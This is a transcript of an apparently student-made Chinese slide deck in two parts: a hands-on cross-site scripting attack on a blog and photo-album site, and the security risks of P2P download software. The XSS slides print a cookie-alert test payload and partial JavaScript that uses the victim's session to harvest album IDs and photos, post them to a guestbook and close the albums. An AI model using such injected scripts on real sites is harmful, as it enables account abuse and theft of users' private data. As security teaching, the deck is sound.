Presentation is loading. Please wait.

Presentation is loading. Please wait.

一、 XSS 實做經驗 – 無 x 小站 二、 P2P 下載軟體之安全疑慮

Similar presentations


Presentation on theme: "一、 XSS 實做經驗 – 無 x 小站 二、 P2P 下載軟體之安全疑慮"— Presentation transcript:

1 一、 XSS 實做經驗 – 無 x 小站 二、 P2P 下載軟體之安全疑慮
國立高雄大學 資訊管理學系 A 洪忠福

2 一、 XSS 實做經驗 – x 名小站

3 嵌入 Javascript

4 alert ( document.cookie);
測試 Javascript alert ( document.cookie);

5 嵌入之前的正常網頁

6 嵌入之後的網頁

7 執行ajax動作(取得所有相簿ID):

8 執行ajax動作(取得所有相簿第一張照片):

9 執行ajax動作(將資訊紀錄在留言板):

10 執行ajax動作(將資訊紀錄在留言板):

11 將相簿關閉:

12 分析 GET 與 POST:

13 分析 GET 與 POST:

14 brequest.onreadystatechange = parseBook;
部份程式碼 ( 取得相簿id ): brequest.onreadystatechange = parseBook; brequest.open('GET',' var all = brequest.responseText; var reg = /option value=\"\d+?\">/ig; if (all!=null) a = all.match(reg); if (a == null) return; var alen = a.length; for (var i= 0; i<alen;i++){ a[i] = a[i].replace(/option value=|[>\"]/g,"") }

15 部份程式碼 (發送xmlHttpRequest):
var fstr = "%E7%B7%A8%E8%BC%AF%E7%9B%B8%E7%B0%BF"; var sendStr = "cid=0&page=0&.c=UyofthX32jh&.t= "; sendStr += “&func_mod=”+fstr + bstr; request.onreadystatechange = ready; request.open('POST',' false); request.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); request.send(sendStr);

16 for (var i=0;i<len;i++){ str += all[i] +"%0D%0A"; }
部份程式碼 (留言): var str = ""; for (var i=0;i<len;i++){ str += all[i] +"%0D%0A"; } var sendstr = “.c=FKIBhhC9SN4&.t= &userid=MyID"; sendstr += “&used_name=sess_name&sess_name=MyID"; sendstr += "& =&url=&rem=true&isCloak=true&title=Test&content=" + str; sendstr += "&leavemsg=%E7%95%99%E8%A8%80"; srequest.onreadystatechange = lastP; srequest.open('POST',' srequest.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); srequest.send(sendstr);

17 二、 P2P 下載軟體之安全疑慮

18 P2P 下載軟體簡介 Peer to Peer:點對點通訊傳輸工具
檔案傳送採取用戶與用戶的通訊模式,傳送檔案的時候,可以同時連接多個下載點,分散式下載檔案 快速完成檔案下載的目標 最普遍廣泛的用途:「盜版物交流」 常見的有:Foxy, eDonkey, BT 等

19 P2P 可能影響網安的問題 1. 使用者門戶大開 2. 佔用頻寬、癱瘓網路 3. 硬體設備損害

20 1. 使用者門戶大開 沒有開啟或安裝防毒軟體、防火牆 抓到假檔、惡意程式 將重要目錄開放分享 電腦遭受攻擊 植入病毒、木馬 洩漏系統檔案
個人資料 各種帳號密碼

21 實例:

22 2. 佔用頻寬、癱瘓網路 P2P 下載軟體的分享制度 上傳與下載的限制 最恐怖的軟體:Foxy 影響人際關係
搜尋時暴力的發出 request 無法調整上傳下載限制 影響人際關係

23 3. 硬體設備損害 處理軟體發出的 request 硬碟的讀寫頻繁 不連續的儲存空間,影響讀取與寫入的動作 改善:系統重整、預先配置硬碟

24 佔用 CPU :

25 The End


Download ppt "一、 XSS 實做經驗 – 無 x 小站 二、 P2P 下載軟體之安全疑慮"

Similar presentations


Ads by Google